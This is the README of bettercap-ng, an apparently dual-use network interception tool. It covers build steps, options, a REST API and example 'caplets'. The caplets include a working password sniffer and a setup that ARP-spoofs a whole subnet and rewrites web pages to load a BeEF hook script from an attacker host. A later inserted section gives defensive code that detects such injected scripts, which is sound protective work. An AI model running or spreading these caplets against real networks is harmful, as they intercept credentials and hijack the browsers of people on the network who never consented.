bettercap-NG

Compiling

Make sure you have a correctly configured Go >= 1.8 environment and that the libpcap-dev package is installed for your system, then:

git clone https://github.com/evilsocket/bettercap-ng $GOPATH/src/github.com/evilsocket/bettercap-ng
cd $GOPATH/src/github.com/evilsocket/bettercap-ng
make deps
make

To show the command-line options:

# sudo ./bettercap-ng -h

Usage of ./bettercap-ng:
  -caplet string
        Read commands from this file and execute them in the interactive session.
  -debug
        Print debug messages.
  -eval string
        Run a command, used to set variables via command line.
  -iface string
        Network interface to bind to.
  -no-history
        Disable history file.
  -silent
        Suppress all logs which are not errors.

Caplets

Interactive sessions can be scripted with .cap files, or caplets. Below are a few basic examples; see the caplets folder for more.

caplets/simple-password-sniffer.cap

A simple password sniffer.

# keep reading arp table for network mapping
net.recon on
# setup a regular expression for packet payloads
set net.sniff.regexp .*password=.+
# set the sniffer output file
set net.sniff.output passwords.pcap
# start the sniffer
net.sniff on

caplets/rest-api.cap

Start a REST API.

# change these!
set api.rest.username bcap
set api.rest.password bcap
# set api.rest.port 8082

# actively probe network for new hosts
net.probe on
net.recon on

# enjoy /api/session and /api/events
api.rest on

Get information about the current session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session

Execute a command in the current interactive session:

curl -k --user bcap:bcap https://bettercap-ip:8083/api/session -H "Content-Type: application/json" -X POST -d '{"cmd":"net.probe on"}'

Get the last 50 events:

curl -k --user bcap:bcap "https://bettercap-ip:8083/api/events?n=50"

Clear the events:

curl -k --user bcap:bcap -X DELETE https://bettercap-ip:8083/api/events

caplets/beef-inject.cap

Use a proxy script to inject a BeEF JavaScript hook:

# targeting the whole subnet by default, to make it selective:
#
#   sudo ./bettercap-ng -caplet caplets/beef-active.cap -eval "set arp.spoof.targets 192.168.1.64"

# inject beef hook
set http.proxy.script caplets/beef-inject.js
# keep reading arp table for network mapping
net.recon on
# redirect http traffic to a proxy
http.proxy on
# wait for everything to start properly
sleep 1
# make sure probing is off as it conflicts with arp spoofing
arp.spoof on

The caplets/beef-inject.js proxy script file:

function onLoad() {
    console.log( "BeefInject loaded." );
    console.log("targets: " + env['arp.spoof.targets']);
}

function onResponse(req, res) {
    if( res.ContentType.indexOf('text/html') == 0 ){
        var body = res.ReadBody();
        if( body.indexOf('</head>') != -1 ) {
            res.Body = body.replace( 
                '</head>', 
                '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>' 
            ); 
            res.Updated();
        }
    }
}
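
From the defender's side, the rewrite performed by the proxy script above shows up as a script source that the origin server never sent. The following is an added example, not code from the bettercap-ng project: it compares a response body against a baseline copy and reports new or off-allowlist script sources. The function names, the page URL and the sample HTML are assumptions constructed for the illustration.

```javascript
// Added example (not from the bettercap-ng project). Names are hypothetical.
const SCRIPT_SRC = /<script\b[^>]*?\bsrc\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/gi;

// Absolute URL of every external script the document references.
function scriptSources(html, pageUrl) {
  const out = [];
  for (const m of html.matchAll(SCRIPT_SRC)) {
    const raw = m[1] ?? m[2] ?? m[3];
    try {
      out.push(new URL(raw, pageUrl).href);
    } catch (e) {
      out.push(raw); // unparsable src: keep the raw value so it is still reported
    }
  }
  return out;
}

// Scripts in the observed body that are new relative to the baseline or that
// load from an origin outside the allowlist (the page's own origin is allowed).
function unexpectedScripts(baselineHtml, observedHtml, pageUrl, allowedOrigins = []) {
  const known = new Set(scriptSources(baselineHtml, pageUrl));
  const allowed = new Set([new URL(pageUrl).origin, ...allowedOrigins]);
  const findings = [];
  for (const src of scriptSources(observedHtml, pageUrl)) {
    let origin = null;
    try { origin = new URL(src).origin; } catch (e) { /* stays null */ }
    const reasons = [];
    if (!known.has(src)) reasons.push("not-in-baseline");
    if (origin === null || !allowed.has(origin)) reasons.push("origin-not-allowed");
    if (reasons.length > 0) findings.push({ src, reasons });
  }
  return findings;
}

// Constructed sample: a baseline page and the same page after the rewrite above.
const PAGE_URL = "http://intranet.example/index.html"; // assumed URL
const BASELINE = '<html><head><title>t</title><script src="/static/app.js"></script></head><body></body></html>';
const OBSERVED = BASELINE.replace("</head>",
  '<script type="text/javascript" src="http://your-beef-box:3000/hook.js"></script></head>');

console.log(unexpectedScripts(BASELINE, OBSERVED, PAGE_URL));
```

The baseline has to be fetched over a path that is not subject to the same interception, for example from the origin server itself.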

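Interactive Mode

Interactive mode lets you start and stop modules manually on the fly, change options, and apply new firewall rules in real time. To show the help menu, type help; for module-specific help, use help module-name.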



Source: https://github.com/evilsocket/bettercap-ng